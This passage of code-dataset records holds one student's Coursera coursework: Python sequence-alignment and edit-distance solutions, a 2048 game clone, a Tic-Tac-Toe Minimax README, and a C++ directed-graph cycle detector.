mean_mu)/sigma\n\nprint \"Q5 Answers\"\nprint \"mean of the distribution: \", mean_mu\nprint \"standard deviation of distribution: \", sigma\nprint \"z-score of the distribution: \", z_score\nprint\n\n##########################################################################\n# Solution Q6\n#\n# Q6: Based on your answers to Questions 4 and 5, is the score resulting from the local \n# alignment of the HumanEyelessProtein and the FruitflyEyelessProtein due to chance? As \n# a concrete question, which is more likely: the similarity between the human eyeless \n# protein and the fruitfly eyeless protein being due to chance or winning the jackpot \n# in an extremely large lottery? Provide a short explanation for your answers\n#\n# Ans: the z-score is around 100, which means the observed score lies far out in the tail of the bell\n# shape. One standard deviation from the mean of around 50 is about 7. 
And\n# we know that 3 standard deviations (sigma) cover about 99% of the bell shape, i.e. the \n# likelihood of a value falling within 3 sigma is high and the probability of a\n# value falling outside 3 sigma is about 1%. The z-score we found tells us that\n# the score we found in Q1 is about 100 standard deviations away from the mean\n# (a score of 875 is more than 100 * sigma + mean).\n# We can find the exact probability using the z-test for the normal distribution,\n# which gives us a probability on the order of 10^(-2000)\n# (https://www.wolframalpha.com/input/?i=Probability+of+100+standard+deviations)\n# which is much smaller than the chance of winning a lottery \n\n##########################################################################\n# Solution Q7\n#\n# Not surprisingly, similarity between pairs of sequences and edit distances between pairs \n# of strings are related. In particular, the edit distance for two strings x and y can be \n# expressed in terms of the lengths of the two strings and their corresponding similarity \n# score as follows: |x| + |y| - score(x, y) where score(x, y) is the score returned by the \n# global alignment of these two strings using a very simple scoring matrix that can be \n# computed using build_scoring_matrix.\n# Determine the values for diag_score, off_diag_score, and dash_score such that the score \n# from the resulting global alignment yields the edit distance when substituted into the \n# formula above\n#\n# Ans: \n# 1-Let x = \"ABC\" and y = \"\". Then global alignment will return x' = \"ABC\" and y' = \"---\",\n# so |x| = 3 and |y| = 0, and the edit distance needs 3 operations to turn \"---\"\n# into \"ABC\", hence score(x, y) = |x| + |y| - 3 = 0. Therefore, dash_score = 0\n# dash_score = 0\n\n# 2-Let x = \"ABC\" and y = \"ABC\". Then global alignment returns the same strings and the edit\n# distance needs zero operations. Hence score(x, y) = |x| + |y| - 0 = 3 + 3 = 6. Thus\n# diag_score must be 2 for the score of x, y to be 6\n# diag_score = 2\n\n# 3-Let x = \"ABC\" and y = \"ABT\". Then global alignment returns the same strings with\n# a total score of score(\"C\", \"T\") + 2 * diag_score. The edit distance needs a\n# substitution of \"T\" with \"C\", i.e. one operation. Thus we have:\n# score(\"C\", \"T\") + 2 * diag_score = |x| + |y| - 1 \n# off_diag_score = 3 + 3 - 1 - 2 * 2 = 1\n# off_diag_score = 1 \n\n##########################################################################\n# Solution Q8\n#\n# Q8: For this final question, we will implement a simple spelling correction function that \n# uses edit distance to determine whether a given string is the misspelling of a word.\n# To begin, load this list of 79339 words. 
Then, write a function \n# check_spelling(checked_word, dist, word_list) that iterates through word_list and returns \n# the set of all words that are within edit distance dist of the string checked_word.\n# Use your function check_spelling to compute the set of words within an edit distance of \n# one from the string \"humble\" and the set of words within an edit distance of two from the \n# string \"firefly\".\n#\n\ndef check_spelling(checked_word, dist, word_list):\n \"\"\"\n Iterates through word_list and returns the set of all words that are\n within edit distance dist of the string checked_word\n \n Arguments:\n checked_word {string} -- the word to spell-check\n dist {int} -- the maximum edit distance allowed\n word_list {list} -- the list of candidate words\n \n Returns:\n set -- all words within edit distance dist of checked_word\n \"\"\"\n \n # initialize the set that will contain the words from word_list within\n # edit distance dist of checked_word\n within_dist = set()\n\n # initialize the set of lowercase letters\n alphabets = set(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'])\n\n # build the scoring matrix with the scores derived in Q7\n score_mat = alg_proj4_sol.build_scoring_matrix(alphabets, 2, 1, 0)\n\n for word in word_list:\n # compute the global alignment matrix\n align_mat = alg_proj4_sol.compute_alignment_matrix(word, checked_word, score_mat, True)\n\n # compute the global alignment score of the word\n (score, _, _) = alg_proj4_sol.compute_global_alignment(word, checked_word, score_mat, align_mat)\n\n # add the word to the within_dist set if its edit distance is at most dist\n if (len(word) + len(checked_word) - score) <= dist:\n within_dist.add(word)\n\n return within_dist\n\n# load the word list\nword_list = alg_app4_prov.read_words(alg_app4_prov.WORD_LIST_URL)\n\n# compute the set of words that are within edit distance 1 of the string \"humble\"\nwith_wrds_humble = check_spelling(\"humble\", 1, word_list)\n\n# compute the set of words that are within edit distance 2 of the string \"firefly\"\nwith_wrds_firefly = check_spelling(\"firefly\", 2, word_list)\n\nprint \"Q8 Answers:\"\nprint \"words within 1 edit distance of string 'humble': \\n\", with_wrds_humble\nprint \"words within 2 edit distance of string 'firefly': \\n\", with_wrds_firefly\n"
},
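Q5 of the genomics record above reduces the un-normalized null distribution (a score -> count dictionary) to a mean, a standard deviation, and a z-score. A self-contained sketch of that arithmetic follows; the summarize name and the tiny histogram are made up for illustration, not taken from a real run.

```python
# Hedged sketch of the Q5 statistics on a score histogram; the input
# dictionary below is illustrative, not a real null distribution.
def summarize(distribution, observed_score):
    trials = float(sum(distribution.values()))
    mean = sum(s * c for s, c in distribution.items()) / trials
    var = sum(((s - mean) ** 2) * c for s, c in distribution.items()) / trials
    sigma = var ** 0.5
    return mean, sigma, (observed_score - mean) / sigma

mean, sigma, z = summarize({40: 200, 50: 600, 60: 200}, 875)
print(mean, sigma, z)  # a very large z signals the score is not due to chance
```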
{
"alpha_fraction": 0.5467495322227478,
"alphanum_fraction": 0.5588725805282593,
"avg_line_length": 32.83589553833008,
"blob_id": "0f936b900e071c58d2d85a37b4cdf890dd75bd62",
"content_id": "080b6f780660c8a5b957ad9a23dea292aed7840f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6599,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 195,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project2 Game 2048/game_2048.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nClone of 2048 game.\n\"\"\"\n\nimport poc_2048_gui\nimport random\n\n# Directions, DO NOT MODIFY\nUP = 1\nDOWN = 2\nLEFT = 3\nRIGHT = 4\n\n# Other global constants\nEMPTY = 0\n\n# Offsets for computing tile indices in each direction.\n# DO NOT MODIFY this dictionary.\nOFFSETS = {UP: (1, 0),\n DOWN: (-1, 0),\n LEFT: (0, 1),\n RIGHT: (0, -1)}\n\ndef merge(line):\n \"\"\"\n Helper function that merges a single row or column in 2048\n \"\"\"\n # create an empty list\n mergelst = []\n \n # put all non-zero values from the list line to begining of mergelst\n for val in list(line):\n if (val != 0):\n mergelst.append(val)\n \n # replace same pairs values with twice it's value\n mergelst2 = [];\n idx = 0\n while idx < (len(mergelst)):\n if (idx < len(mergelst)-1 and mergelst[idx] == mergelst[idx+1]):\n mergelst2.append(2*mergelst[idx])\n idx += 1\n else:\n mergelst2.append(mergelst[idx])\n \n idx +=1\n \n # add zeros at the end of merged list to make the size same as list line \n mergelst2.extend([0]*(len(line)-len(mergelst2)))\n \n return mergelst2\n\ndef get_indices(lst_of_lst):\n \"\"\"\n Helper function that travesrses over a list of lists and returns\n a list of indices corresponding to zero value\n \"\"\"\n # initialize empty list to hold indices(row, col) for locations\n # of zero value in the input list \n lst_of_indices = []\n # iterate over the input list and add indices(row,col) as required\n for row_idx in range(len(lst_of_lst)):\n lst_of_indices += [[row_idx, col_idx] \n for col_idx in range(len(lst_of_lst[row_idx])) \n if lst_of_lst[row_idx][col_idx] == EMPTY ]\n \n return lst_of_indices\n\nclass TwentyFortyEight:\n \"\"\"\n Class to run the game logic.\n \"\"\"\n\n def __init__(self, grid_height, grid_width):\n # intialize the class private members\n self._grid_height = grid_height\n self._grid_width = grid_width\n self._grid_empty_indices = []\n self._grid = []\n # holds the initial/starting tile values for each direction\n self._strt_tiles = {UP: [(0,col) for col in range(self._grid_width)],\n DOWN: [(self._grid_height - 1,col) for col in range(self._grid_width)],\n LEFT: [(row, 0) for row in range(self._grid_height)],\n RIGHT: [(row, self._grid_width - 1) for row in range(self._grid_height)]}\n # reset creates any empty grid and adds two new tiles\n self.reset()\n \n def reset(self):\n \"\"\"\n Reset the game so the grid is empty except for two\n initial tiles.\n \"\"\"\n # create an empty grid(list of lists)\n self._grid = [[0] * self._grid_width \n for dummy_num in range(self._grid_height)]\n self.new_tile()\n self.new_tile()\n\n def __str__(self):\n \"\"\"\n Return a string representation of the grid for debugging.\n \"\"\"\n # replace with your code\n grid_str = \"current grid values:\\n\"\n for row in range(self._grid_height):\n grid_str += str(self._grid[row])+ \"\\n\"\n return grid_str\n\n def get_grid_height(self):\n \"\"\"\n Get the height of the board.\n \"\"\"\n return self._grid_height\n\n def get_grid_width(self):\n \"\"\"\n Get the width of the board.\n \"\"\"\n return self._grid_width\n\n def move(self, direction):\n \"\"\"\n Move all tiles in the given direction and add\n a new tile if any tiles moved.\n \"\"\"\n # state to store if any title value has changed or not after a move\n changed = False\n # iterate of initial/start tile for the given direction to perform move\n for row, col in self._strt_tiles[direction]:\n # line will hold all the row or cols for the given starting tile\n line = []\n # store the start tile row and column\n strt_row = 
row\n strt_col = col\n # iterate over all tiles starting at the start tile and add the values\n # of the tiles to a temporary list line\n while 0 <= row < self.get_grid_height() and 0 <= col < self.get_grid_width():\n line.append(self.get_tile(row, col))\n row += OFFSETS[direction][0]\n col += OFFSETS[direction][1]\n \n # perform merge on the stored values for a given row or column of the grid \n merge_line = merge(line)\n # check to see if any values changed during merge and update the value\n # of that location on the grid\n for val in merge_line:\n if val != self.get_tile(strt_row, strt_col):\n changed = True\n self.set_tile(strt_row, strt_col, val)\n strt_row += OFFSETS[direction][0]\n strt_col += OFFSETS[direction][1]\n \n # if any tile changed during a move along a given direction, randomly\n # add a new tile\n if (changed):\n self.new_tile()\n \n\n def new_tile(self):\n \"\"\"\n Create a new tile in a randomly selected empty\n square. The tile should be 2 90% of the time and\n 4 10% of the time.\n \"\"\"\n # get a list of all the empty locations on the grid\n self._grid_empty_indices = get_indices(self._grid)\n\n # add a new tile only if the grid has any empty tiles \n if len(self._grid_empty_indices) != EMPTY:\n # randomly select the (row, col) index of an empty grid cell\n rnd_val = random.randrange(0, len(self._grid_empty_indices))\n # get the row and col number of this empty tile\n row = self._grid_empty_indices[rnd_val][0]\n col = self._grid_empty_indices[rnd_val][1]\n # create a list of nine 2's and one 4 to achieve the 90%\n # and 10% probability criteria\n lst_tiles = [2] * 9 + [4]\n # select 2 (90%) or 4 (10%) of the time and set it as the value of\n # the empty tile randomly selected earlier\n self._grid[row][col] = random.choice(lst_tiles) \n\n def set_tile(self, row, col, value):\n \"\"\"\n Set the tile at position row, col to have the given value.\n \"\"\"\n self._grid[row][col] = value\n\n def get_tile(self, row, col):\n \"\"\"\n Return the value of the tile at position row, col.\n \"\"\"\n return self._grid[row][col]\n\n\npoc_2048_gui.run_gui(TwentyFortyEight(4, 4))\n\n"
},
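The merge step in the 2048 record above slides non-zero tiles to the front, combines each equal adjacent pair once, and pads with zeros. Below is a compact standalone restatement of that logic with assert-based checks; the expected outputs follow the mini-project's published spec, and this sketch is not the graded implementation.

```python
# Sketch of the 2048 merge semantics described above; each tile merges
# at most once per move, so [2, 2, 2, 2] becomes [4, 4, 0, 0].
def merge(line):
    tiles = [val for val in line if val != 0]   # slide non-zeros forward
    merged = []
    idx = 0
    while idx < len(tiles):
        if idx + 1 < len(tiles) and tiles[idx] == tiles[idx + 1]:
            merged.append(2 * tiles[idx])       # combine an equal pair once
            idx += 2
        else:
            merged.append(tiles[idx])
            idx += 1
    return merged + [0] * (len(line) - len(merged))

assert merge([2, 0, 2, 4]) == [4, 4, 0, 0]
assert merge([0, 0, 2, 2]) == [4, 0, 0, 0]
assert merge([2, 2, 2, 2]) == [4, 4, 0, 0]
assert merge([8, 16, 16, 8]) == [8, 32, 8, 0]
```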
{
"alpha_fraction": 0.7761263251304626,
"alphanum_fraction": 0.7858801484107971,
"avg_line_length": 133.5625,
"blob_id": "effc043fd4890a675e2ff0ce0bef633a207ae33e",
"content_id": "08478ecf5dc6eff750839e098805b59c6819885a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2153,
"license_type": "no_license",
"max_line_length": 831,
"num_lines": 16,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project3 Tic-Tac-Toe(Minimax)/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #3 Tic-Tac-Toe(Minimax)\n\nImplemented the machine player for Tic-Tac-Toe game using Minimax strategy in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_NHM1TTnSvs_131.py) and press the play button on the top left corner. A window will pop up, starting the game.\n\nLink to my test suite for the implementation:\n<http://www.codeskulptor.org/#user46_yE2BTCBXxA_1.py>\n\nMini-project overview taken from course page can be found below:\n* We have previously seen Tic-Tac-Toe in part 1 of this class. In this assignment, we are going to revisit the game and develop an alternative strategy to play the game.\n\n* For this assignment, your task is to implement a machine player for Tic-Tac-Toe that uses a Minimax strategy to decide its next move. You will be able to use the same console-based interface and graphical user interface to play the game as you did before. Although the game is played on <a href=\"https://www.codecogs.com/eqnedit.php?latex=3&space;\\times&space;3\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?3&space;\\times&space;3\" title=\"3 \\times 3\" /></a> grid, your version should be able to handle any square grid (however, the time it will take to search the tree for larger grid sizes will be prohibitively slow). We will continue to use the same [grid conventions](https://www.coursera.org/learn/principles-of-computing-2/supplement/2DOSk/math-notes-on-grid-representations) that we have used previously.\n\n* This project does not require you to write a lot of code. It does, however, bring together a lot of concepts that we have previously seen in the class. We would like you to think about how these concepts are coming together to enable you to build a relatively complex machine player with very little code. Further, you should think about the situations in which Minimax or Monte Carlo might produce better/worse machine players for games other than Tic-Tac-Toe.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-2/supplement/hPToP/mini-project-description>\n"
},
{
"alpha_fraction": 0.5621632933616638,
"alphanum_fraction": 0.5738707184791565,
"avg_line_length": 41.89777755737305,
"blob_id": "6260a9f7e5895182bb565cd18245294c61564685",
"content_id": "552aacf344ba40e977da64dee7985eb3aee549c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9652,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 225,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 2)/Module 4/alg_project4_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAll the algorithms for Project#4 - Computing\nAlignments of Sequences\n\"\"\"\n\ndef build_scoring_matrix(alphabet, diag_score, off_diag_score, dash_score):\n \"\"\"\n The function computes a scoring matrix(a dictionary of dictionaries)\n whose entries are indexed by pairs of characters in alphabet plus '-' \n The score for any entry indexed by one or more dashes is dash_score. \n The score for the remaining diagonal entries is diag_score. Finally, \n the score for the remaining off-diagonal entries is off_diag_score.\n\n Arguments:\n alphabet {set} -- a set of characters\n diag_score {integer} -- the diagnal score for the scoring matrix\n off_diag_score {integer} -- the off diagnal score\n dash_score {[type]} -- the score that includes atleast one dash\n \n Returns:\n a dictionary of dictionary -- the scoring matrix \n \"\"\"\n # initialize the scoring matrix\n scoring_matrix = {}\n # add the dash character to the set of alphabets\n all_chars = alphabet.union(\"-\")\n\n # create a dictionary of dictionary for scores \n for char_i in all_chars:\n scoring_matrix[char_i] = {}\n for char_j in all_chars:\n if (char_i == \"-\" or char_j == \"-\"):\n scoring_matrix[char_i][char_j] = dash_score \n elif (char_i == char_j):\n scoring_matrix[char_i][char_j] = diag_score\n else:\n scoring_matrix[char_i][char_j] = off_diag_score\n\n\n return scoring_matrix\n\ndef compute_alignment_matrix(seq_x, seq_y, scoring_matrix, global_flag):\n \"\"\"\n Takes as input two sequences seq_x and seq_y whose elements share a common \n alphabet with the scoring matrix scoring_matrix. The function computes and \n returns the alignment matrix for seq_x and seq_y. If global_flag is True, \n the global alignment matrix is computed. If global_flag is False, local \n alignment matrix is computed\n\n For global alignment matrix S, each entry S[i][j] contains the maximum score \n over every possible global alignment of the pair of sequences seq_x[0...i-1] and\n seq_y[0...j-1] \n\n For local alignment matrix S, each entry entry S[i][j] contains the maximum score \n over every possible alignment of the pair of sequences seq_x[0...i-1] and \n seq_y[0...j-1] except for the case when S[i][j] < 0, S[i][j] is set to zero\n\n Arguments:\n seq_x {string} -- a string of alphabets whose elements share a common alphabet \n with scoring matrics\n seq_y {string} -- a string of alphabets whose elements share a common alphabet \n with scoring matrics\n scoring_matrix {a dictionary of dictionaries} -- the scoring matrix with each\n alphabet plus '-' combination\n scores\n global_flag {bolean -- flag to choose between global and local alignment\n \n Returns:\n list of lists -- an alignment matrix for seq_x and seq_y \n \"\"\"\n # let align_matrix = S. 
Then initialize S[0][0] = 0\n align_matrix = [[0]]\n\n # set the alignment matrix's column 0 to appropriate score either based on local or global\n # alignment selected\n for idx in range(1, len(seq_x) + 1):\n align_matrix.append([align_matrix[idx - 1][0] + scoring_matrix[seq_x[idx - 1]][\"-\"] ])\n if not global_flag and align_matrix[idx][0] < 0:\n align_matrix[idx][0] = 0\n\n # set the alignment matrix's row 0 to appropriate score either based on local or global\n # alignment selected\n for idx in range(1, len(seq_y) + 1):\n align_matrix[0].append(align_matrix[0][idx - 1] + scoring_matrix[\"-\"][seq_y[idx - 1]])\n if not global_flag and align_matrix[0][idx] < 0:\n align_matrix[0][idx] = 0\n\n # set the remaining alignment matrix(S) values based on previous 3 values of S[i-1][j-1], S[i-1][j],\n # and S[i][j-1]\n for idx_x in range(1, len(seq_x) + 1):\n for idx_y in range(1, len(seq_y) + 1):\n val1 = align_matrix[idx_x - 1][idx_y - 1] + scoring_matrix[seq_x[idx_x - 1]][seq_y[idx_y - 1]]\n val2 = align_matrix[idx_x - 1][idx_y] + scoring_matrix[seq_x[idx_x - 1]][\"-\"]\n val3 = align_matrix[idx_x][idx_y - 1] + scoring_matrix[\"-\"][seq_y[idx_y - 1]]\n align_matrix[idx_x].append(max(set([val1, val2, val3])))\n if not global_flag and align_matrix[idx_x][idx_y] < 0:\n align_matrix[idx_x][idx_y] = 0\n\n return align_matrix\n\ndef compute_global_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n \"\"\"\n Takes as input two sequences seq_x and seq_y whose elements share a common alphabet\n with the scoring matrix scoring_matrix. This function computes a global alignment of\n seq_x and seq_y using the global alignment matrix alignment_matrix. The function returns\n a tuple of the form (score, align_x, align_y) where score is the score of the global \n alignment align_x and align_y. 
Note that align_x and align_y should have the same \n length and may include the padding character '-'.\n\n Arguments:\n seq_x {string} -- a string of alphabets\n seq_y {string} -- a string of alphabets\n scoring_matrix {dictionary of dictionaries} -- the scoring matrix\n alignment_matrix {list of lists} -- the global alignment matrix\n \n Returns:\n tuple -- returns (score, align_x, align_y) where score is the score of the global \n alignment align_x and align_y.\n \"\"\"\n\n # intialize the indicies to the lengths of the sequences\n idx_x = len(seq_x)\n idx_y = len(seq_y)\n align_x = \"\"\n align_y = \"\"\n score = 0\n\n while (idx_x != 0 and idx_y != 0):\n if (alignment_matrix[idx_x][idx_y] == (alignment_matrix[idx_x - 1][idx_y - 1] \n + scoring_matrix[seq_x[idx_x - 1]][seq_y[idx_y - 1]])):\n align_x = seq_x[idx_x - 1] + align_x\n align_y = seq_y[idx_y - 1] + align_y\n score += scoring_matrix[seq_x[idx_x - 1]][seq_y[idx_y - 1]]\n idx_x -= 1\n idx_y -= 1\n \n else:\n if (alignment_matrix[idx_x][idx_y] == (alignment_matrix[idx_x - 1][idx_y] \n + scoring_matrix[seq_x[idx_x - 1]][\"-\"])):\n align_x = seq_x[idx_x - 1] + align_x\n align_y = \"-\" + align_y\n score += scoring_matrix[seq_x[idx_x - 1]][\"-\"]\n idx_x -= 1\n\n else:\n align_x = \"-\" + align_x\n align_y = seq_y[idx_y - 1] + align_y\n score += scoring_matrix[\"-\"][seq_y[idx_y - 1]]\n idx_y -= 1\n \n while idx_x != 0:\n align_x = seq_x[idx_x - 1] + align_x\n align_y = \"-\" + align_y\n score += scoring_matrix[seq_x[idx_x - 1]][\"-\"]\n idx_x -= 1\n\n while idx_y != 0:\n align_x = \"-\" + align_x\n align_y = seq_y[idx_y - 1] + align_y\n score += scoring_matrix[\"-\"][seq_y[idx_y - 1]]\n idx_y -= 1 \n \n\n return (score, align_x, align_y)\n\ndef compute_local_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n \"\"\"\n Takes as input two sequences seq_x and seq_y whose elements share a common alphabet\n with the scoring matrix scoring_matrix. This function computes a local alignment of\n seq_x and seq_y using the local alignment matrix alignment_matrix. The function returns\n a tuple of the form (score, align_x, align_y) where score is the score of the local \n alignment align_x and align_y. 
Note that align_x and align_y should have the same \n length and may include the padding character '-'.\n\n Arguments:\n seq_x {string} -- a string of alphabets\n seq_y {string} -- a string of alphabets\n scoring_matrix {dictionary of dictionaries} -- the scoring matrix\n alignment_matrix {list of lists} -- the local alignment matrix\n \n Returns:\n tuple -- returns (score, align_x, align_y) where score is the score of the local \n alignment align_x and align_y.\n \"\"\"\n \n # initialize the variables\n max_value = float(\"-inf\")\n idx_x = -1\n idx_y = -1\n align_x = \"\"\n align_y = \"\"\n score = 0\n\n # find the location (row, col) of the maximum value in alignment_matrix\n for row in range(len(alignment_matrix)):\n for col in range(len(alignment_matrix[row])):\n if alignment_matrix[row][col] > max_value:\n max_value = alignment_matrix[row][col]\n idx_x = row\n idx_y = col\n\n while alignment_matrix[idx_x][idx_y] != 0 and idx_x != 0 and idx_y != 0:\n if (alignment_matrix[idx_x][idx_y] == (alignment_matrix[idx_x - 1][idx_y - 1] \n + scoring_matrix[seq_x[idx_x - 1]][seq_y[idx_y - 1]])):\n align_x = seq_x[idx_x - 1] + align_x\n align_y = seq_y[idx_y - 1] + align_y\n score += scoring_matrix[seq_x[idx_x - 1]][seq_y[idx_y - 1]]\n idx_x -= 1\n idx_y -= 1\n \n else:\n if (alignment_matrix[idx_x][idx_y] == (alignment_matrix[idx_x - 1][idx_y] \n + scoring_matrix[seq_x[idx_x - 1]][\"-\"])):\n align_x = seq_x[idx_x - 1] + align_x\n align_y = \"-\" + align_y\n score += scoring_matrix[seq_x[idx_x - 1]][\"-\"]\n idx_x -= 1\n\n else:\n align_x = \"-\" + align_x\n align_y = seq_y[idx_y - 1] + align_y\n score += scoring_matrix[\"-\"][seq_y[idx_y - 1]]\n idx_y -= 1\n \n return (score, align_x, align_y)\n"
},
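Both traceback routines in the record above consume a precomputed alignment matrix. A minimal sketch of that DP step is below, assuming the same conventions (a scoring matrix indexed by characters plus the '-' padding character); this is an illustration, not the repository's own helper, though the course project defines one like it. The flag switches between the global table and the local one, where negative entries are clamped to zero.

```python
def compute_alignment_matrix(seq_x, seq_y, scoring_matrix, global_flag):
    """Build the DP table consumed by the traceback routines.

    With global_flag True this is the standard global (Needleman-Wunsch)
    recurrence; with global_flag False, negative entries are clamped to 0,
    which yields the local (Smith-Waterman) table.
    """
    rows, cols = len(seq_x) + 1, len(seq_y) + 1
    table = [[0] * cols for _ in range(rows)]

    # first column: repeatedly pay the gap penalty against seq_x characters
    for row in range(1, rows):
        table[row][0] = table[row - 1][0] + scoring_matrix[seq_x[row - 1]]["-"]
        if not global_flag:
            table[row][0] = max(table[row][0], 0)

    # first row: gap penalties against seq_y characters
    for col in range(1, cols):
        table[0][col] = table[0][col - 1] + scoring_matrix["-"][seq_y[col - 1]]
        if not global_flag:
            table[0][col] = max(table[0][col], 0)

    # interior cells: best of match/mismatch, gap in seq_y, gap in seq_x
    for row in range(1, rows):
        for col in range(1, cols):
            table[row][col] = max(
                table[row - 1][col - 1]
                + scoring_matrix[seq_x[row - 1]][seq_y[col - 1]],
                table[row - 1][col] + scoring_matrix[seq_x[row - 1]]["-"],
                table[row][col - 1] + scoring_matrix["-"][seq_y[col - 1]])
            if not global_flag:
                table[row][col] = max(table[row][col], 0)
    return table
```

With `global_flag=False`, the maximum entry of the returned table is exactly the score that `compute_local_alignment` locates before starting its traceback.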
{
"alpha_fraction": 0.5364842414855957,
"alphanum_fraction": 0.5677169561386108,
"avg_line_length": 24.602941513061523,
"blob_id": "e83b5fb9d6cafeea302916e71ecdba07103a62d9",
"content_id": "8fa92d5b09436723733a3060a5e2f3480f4835f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3636,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 136,
"path": "/Algorithms on Graphs/Assignment2/acyclicity.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: acyclicity.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-03\r\n// description: Problem 1 of the second assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was : Check whether a given directed graph with n vertices \r\n//\t\t\t\tand m edges contains a cycle.\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tDFS and acyclic functions and testing had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.01/1.00 sec, max memory used: 7.57/512 MB. \r\n\r\n\r\n#include <iostream>\r\n#include <vector>\r\n\r\nusing std::vector;\r\nusing std::pair;\r\n\r\n/**\r\nPeforms a Depth first search on a given vertice v to check for cycles\r\n\r\nPRE: 1 ≤ adj.size() ≤ 10e3 , 0 ≤ graph edges ≤ 10e3, visited.size() = adj.size()\r\nPOST: return true if the given vertice can reach to itself, false otherwise.\r\nPARAM: adj = a graph in the form of adjacency list\r\n\t visited = a vector to store the visited state of each vertice\r\n\t u = a vertice of the graph adj \r\n**/\r\nbool DFS(vector<vector<int> > &adj, vector<bool> visited, int u) {\r\n\t\r\n\tvisited[u] = true;\r\n\tbool res = false;\r\n\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj[u].size(); v++) {\r\n\r\n\t\tif (visited[adj[u][v]] == true) {\r\n\t\t\treturn true;\r\n\t\t}\r\n\r\n\t\telse {\r\n\r\n\t\t\tres = DFS(adj, visited, adj[u][v]);\r\n\t\t\tif (res == true)\r\n\t\t\t\treturn true;\r\n\r\n\t\t}\r\n\t}\r\n\r\n\treturn false;\r\n}\r\n\r\n/**\r\nFinds if there exist a cycle in the graph\r\n\r\nPRE: 1 ≤ adj.size() ≤ 10e3 , 0 ≤ graph edges ≤ 10e3\r\nPOST: returns 1 if the graph contains a cycle , 0 otherwise\r\nPARAM: adj = a graph in the form of adjacency list\r\n\r\n**/\r\n\r\nint acyclic(vector<vector<int> > &adj) {\r\n\t\r\n\tbool result;\r\n\tvector<bool> visited(adj.size(), false);\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj.size(); v++) {\r\n\t\t\r\n\r\n\t\t\tresult = DFS(adj, visited, v);\r\n\t\t\tif (result == true)\r\n\t\t\t\treturn 1;\r\n\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tsize_t n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tfor (size_t i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t}\r\n\tstd::cout << acyclic(adj);\r\n\r\n\t// Few test case to check if the acyclic function works. 
These are commented since the \r\n\t// assignment requires the acyclicity.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/********************************************************************************\r\n\t\r\n\t//Test case 1: a pair of vertices forms a cycle\r\n\tvector<vector<int> > adj1(4, vector<int>());\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tadj1[2 - 1].push_back(1 - 1);\r\n\r\n\tif (acyclic(adj1) == 0)\r\n\t\tstd::cout << \"Test 1 failed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 1 passed\" << std::endl;\r\n\r\n\t//Test case 2: no cycle\r\n\tvector<vector<int> > adj2(4, vector<int>());\r\n\tadj2[1 - 1].push_back(2 - 1);\r\n\tadj2[2 - 1].push_back(3 - 1);\r\n\tadj2[3 - 1].push_back(4 - 1);\r\n\r\n\tif (acyclic(adj2) == 1)\r\n\t\tstd::cout << \"Test 2 failed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 2 passed\" << std::endl;\r\n\r\n\t//Test case 3: all vertice can reach from all vertices, 1 cycle\r\n\tvector<vector<int> > adj3(4, vector<int>());\r\n\tadj3[1 - 1].push_back(2 - 1);\r\n\tadj3[2 - 1].push_back(3 - 1);\r\n\tadj3[3 - 1].push_back(4 - 1);\r\n\tadj3[4 - 1].push_back(1 - 1);\r\n\r\n\tif (acyclic(adj3) == 0)\r\n\t\tstd::cout << \"Test 3 failed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 3 passed\" << std::endl;\r\n\r\n\r\n\tsystem(\"PAUSE\");\r\n\r\n\t*************************************************************************/\r\n}\r\n"
},
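One subtlety in the acyclicity record above: `DFS` takes `visited` by value, so the marks a call sees are exactly those made by its ancestors, which is why a hit on a visited vertex means a back edge. The more common way to express the same idea is an explicit three-color DFS; a hedged Python sketch follows (an illustration, not the repository's C++ solution).

```python
def has_cycle(adj):
    """Three-color DFS over an adjacency list.

    WHITE = unvisited, GRAY = on the current DFS path, BLACK = fully
    explored.  Reaching a GRAY neighbour means a back edge, i.e. a cycle.
    """
    WHITE, GRAY, BLACK = 0, 1, 2
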